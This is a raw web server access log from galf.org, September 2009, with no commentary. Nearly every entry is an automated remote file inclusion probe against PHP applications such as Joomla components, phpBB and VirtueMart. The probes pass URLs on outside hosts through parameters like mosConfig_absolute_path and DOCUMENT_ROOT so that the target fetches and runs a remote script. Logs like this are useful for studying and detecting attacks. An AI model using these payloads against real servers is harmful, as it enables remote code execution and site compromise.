207.58.163.86 - - [06/Sep/2009:20:30:08 -0700] "GET /logs/access_090223.log%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:51 -0700] "GET /logs//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:51 -0700] "GET /logs/access_090518.log%20%20//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:51 -0700] "GET /?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:54 -0700] "GET /logs/access_090518.log%20%20//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:54 -0700] "GET /logs//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:31:54 -0700] "GET /?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:32:01 -0700] "GET /logs/access_090302.log%20%20//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:32:03 -0700] "GET /logs/access_090302.log%20%20//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.144.100 - - [06/Sep/2009:20:37:42 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:00 -0700] "GET /logs/access_090223.log/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:00 -0700] "GET /admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:00 -0700] "GET /logs/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:07 -0700] "GET /logs/access_090302.log/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
110.45.144.100 - - [06/Sep/2009:20:38:07 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
110.45.144.100 - - [06/Sep/2009:20:38:08 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:46 -0700] "GET /logs/access_090223.log/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:46 -0700] "GET /admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:46 -0700] "GET /logs/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:38:55 -0700] "GET /logs/access_090302.log/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:39:15 -0700] "GET /errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [06/Sep/2009:20:39:15 -0700] "GET /logs/access.log/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [06/Sep/2009:20:39:15 -0700] "GET /logs/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.202.66 - - [06/Sep/2009:20:40:43 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:40:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:41:18 -0700] "GET /logs/access.log%20%20/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [06/Sep/2009:20:44:22 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:44:22 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:44:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:20:44:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:20:48:12 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:20:48:12 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:20:48:12 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [06/Sep/2009:20:48:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [06/Sep/2009:20:48:47 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [06/Sep/2009:20:48:48 -0700] "GET /logs/?M=A HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [06/Sep/2009:20:48:49 -0700] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:50:53 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:50:53 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:52:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:52:01 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:57:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:20:57:14 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:52 -0700] "GET /logs/access.log/index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:52 -0700] "GET /logs/index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:52 -0700] "GET /index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:54 -0700] "GET /logs/access.log/index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:54 -0700] "GET /index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.242.165.138 - - [06/Sep/2009:20:57:54 -0700] "GET /logs/index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:21:00:53 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:21:00:53 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:21:00:53 -0700] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [06/Sep/2009:21:02:12 -0700] "GET /logs/access_090720.log HTTP/1.0" 200 6858611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:21:04:21 -0700] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:21:05:29 -0700] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:39 -0700] "GET /errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:40 -0700] "GET /logs/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:40 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.6.22.91 - - [06/Sep/2009:21:06:41 -0700] "GET /logs/access_090216.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /logs/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:06:46 -0700] "GET /logs/errors.php?error=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:13:09 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:13:09 -0700] "GET /errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:13:09 -0700] "GET /logs/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.120.237.150 - - [06/Sep/2009:21:15:32 -0700] "GET /logs/access.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
216.120.237.150 - - [06/Sep/2009:21:15:32 -0700] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
216.120.237.150 - - [06/Sep/2009:21:15:32 -0700] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
62.128.135.52 - - [06/Sep/2009:21:20:31 -0700] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
218.27.203.107 - - [06/Sep/2009:21:21:44 -0700] "GET /logs/access_090216.log//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [06/Sep/2009:21:22:10 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.120.237.150 - - [06/Sep/2009:21:23:36 -0700] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:24:21 -0700] "GET /logs/access.log/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:24 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:30 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:30 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:31 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:24:31 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:28:04 -0700] "GET /logs/access_090720.log/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:28:04 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:28:04 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:28:24 -0700] "GET /logs/access_090727.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:28:42 -0700] "GET /logs/access_090727.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:21:28:45 -0700] "GET /logs/access_090727.log%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:30:02 -0700] "GET /logs/access_090601.log%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:30:02 -0700] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:30:02 -0700] "GET /logs/access_090615.log%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:30:02 -0700] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:35:52 -0700] "GET /logs/access_090720.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:35:52 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.84.169.161 - - [06/Sep/2009:21:35:52 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [06/Sep/2009:21:36:40 -0700] "GET /logs/access_090316.log//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:21:37:29 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [06/Sep/2009:21:37:33 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [06/Sep/2009:21:37:33 -0700] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.97 - - [06/Sep/2009:21:39:36 -0700] "GET /logs//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:39:36 -0700] "GET /inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:39:36 -0700] "GET /logs/access_090413.log%20%20//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:21:39:54 -0700] "GET /logs/access_090406.log%20%20//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:21:43:15 -0700] "GET /logs//?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:21:43:15 -0700] "GET /logs/access_090202.log%20%20//?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:21:43:18 -0700] "GET /?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:21:47:31 -0700] "GET /logs/access.log%20%20//?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [06/Sep/2009:21:47:32 -0700] "GET /?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [06/Sep/2009:21:47:32 -0700] "GET /logs//?mosConfig_absolute_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
63.249.95.132 - - [06/Sep/2009:21:47:35 -0700] "GET /logs/access.log%20/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
63.249.95.132 - - [06/Sep/2009:21:47:36 -0700] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
63.249.95.132 - - [06/Sep/2009:21:47:36 -0700] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
67.212.175.154 - - [06/Sep/2009:21:47:49 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [06/Sep/2009:21:47:49 -0700] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [06/Sep/2009:21:47:49 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.96.209.10 - - [06/Sep/2009:21:48:51 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.96.209.10 - - [06/Sep/2009:21:48:51 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
